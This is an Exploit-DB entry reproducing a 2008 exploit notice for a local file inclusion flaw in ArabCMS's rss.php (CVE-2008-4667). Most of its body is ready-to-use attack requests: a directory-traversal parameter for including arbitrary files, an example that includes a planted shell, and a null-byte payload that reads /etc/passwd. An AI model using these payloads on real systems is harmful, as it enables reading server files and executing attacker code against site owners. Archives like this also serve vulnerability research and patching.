ArabCMS - 'rss.php' Local File Inclusion

EDB-ID:

6628

CVE:

2008-4667

EDB Verified:

Author:

JIKO

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2008-09-29

Vulnerable App:

####################################################################################
######              Local File Inclusion Vulnerabilities                       #####
###### http://www.the-ghost.com/extras/am2/am%202.0%20beta%201.zip             #####
###### author : JIKO                                                           #####
###### foor read a php file >     ?rss=[name of file iwthout php]              #####
###### for execute exploit does not write extention of file                    #####
######                                                                         #####
######                                                                         #####
###### exploit : /Script/rss.php?rss=../[name of file wthout php]              #####
######                                                                         #####
###### example : /Script/rss.php?rss==/home/user/shell                         #####
######                                                                         #####
###### other files:        rss=../../../../etc/passwd%00                       #####
######           WwW.No-exploit.Com  cha7ta.eu                                 #####
######  H-T Team , v4 Team  , Tryag , no-Back all my friend                    #####
####################################################################################
------==        troops of Mohamed comming inchalah     =-----------------
Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc

# milw0rm.com [2008-09-29]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services